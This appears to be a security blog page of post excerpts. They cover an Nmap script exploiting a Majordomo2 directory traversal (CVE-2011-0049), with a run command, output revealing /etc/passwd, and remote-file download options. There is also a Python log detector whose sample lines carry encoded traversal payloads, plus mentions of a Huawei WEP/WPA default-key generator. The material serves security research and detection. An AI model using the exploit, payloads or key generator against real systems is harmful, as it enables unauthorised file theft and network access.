A few months ago I submitted an article to Pentest Magazine called "Gathering web server information with Nmap NSE".
HTTP response analysis with Nmap
Widely used protocols are always at the mercy of the developers implementing them, and HTTP is no exception. Specially crafted requests make each web server behave in its own way, and this allows us to do some nifty tricks to
This is my Nmap script http-majordomo2-dir-traversal. It exploits a directory traversal vulnerability in Majordomo2 (CVE-2011-0049). Update your Nmap repository to try it:
nmap -p80 --script http-majordomo2-dir-traversal <host/ip>
PORT   STATE SERVICE
80/tcp open  http    syn-ack
| http-majordomo2-dir-traversal: /etc/passwd was found:
|
| root:x:0:0:root:/root:/bin/bash
| bin:x:1:1:bin:/bin:/sbin/nologin
- http-majordomo2-dir-traversal.rfile - Remote file to download. Default: /etc/passwd
- http-majordomo2-dir-traversal.uri - URI path to mj_wwwusr. Default: /cgi-bin/mj_wwwusr
- http-majordomo2-dir-traversal.outfile - If set, saves the remote file to this location.
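A defender-side companion, added here as an example and not part of the Nmap script or the original post: it scans web-server access log lines for requests to the mj_wwwusr URI whose path or query carries a ".." segment after URL-decoding (including double-encoded forms). The log lines and the query parameter name `arg` are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Common Log Format), not real traffic.
# The parameter name "arg" is a placeholder chosen for this example.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Mar/2011:10:00:01 +0000] "GET /cgi-bin/mj_wwwusr?list=test HTTP/1.1" 200 512
10.0.0.7 - - [01/Mar/2011:10:00:02 +0000] "GET /cgi-bin/mj_wwwusr?list=test&arg=../../../../etc/passwd HTTP/1.1" 200 1734
10.0.0.9 - - [01/Mar/2011:10:00:03 +0000] "GET /cgi-bin/mj_wwwusr?list=test&arg=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1734
10.0.0.9 - - [01/Mar/2011:10:00:04 +0000] "GET /cgi-bin/mj_wwwusr?arg=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1734
10.0.0.3 - - [01/Mar/2011:10:00:05 +0000] "GET /index.html HTTP/1.1" 200 88
"""

# Pull the request line ("METHOD target HTTP/x.y") out of a CLF record.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def has_traversal(target: str) -> bool:
    """True if the request target contains a '..' path segment once
    percent-encoding has been fully unwound (catches %2e%2e and %252e)."""
    decoded = target
    for _ in range(3):                 # unwind a few layers of encoding
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    # '..' must be a whole segment: preceded by start, '/', '\', '?', '=' or '&'
    # and followed by a separator or the end of the string.
    return re.search(r'(^|[/\\?=&])\.\.([/\\]|$)', decoded) is not None


def flag_majordomo_traversal(log_text: str, uri: str = "/cgi-bin/mj_wwwusr") -> list:
    """Return one dict per log line that targets the mj_wwwusr URI and
    contains a traversal sequence: {'client': <ip>, 'target': <request target>}."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = m.group("target")
        if target.startswith(uri) and has_traversal(target):
            hits.append({"client": line.split()[0], "target": target})
    return hits


if __name__ == "__main__":
    for hit in flag_majordomo_traversal(SAMPLE_LOG):
        print(f"{hit['client']} -> {hit['target']}")
```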
I created a small web application that uses Bing's results to list all the hostnames pointing to an IP address. This is useful for pentesting services like HTTP servers that behave according to the hostname used. Don't abuse it ;)
We are proud to release our WEP/WPA default key generator for Huawei HG520x and HG530 Gateways. These devices use a weak cipher to generate their default keys and Humberto Ochoa, one of our vulnerability researchers at Websec, did a great job deciphering the algorithm:
Ironically, Prodigy Telmex, the biggest ISP in Mexico, just replaced my old 2wire router with one of these vulnerable modems, a newer and "better" device (according to their technician, of course, hehe).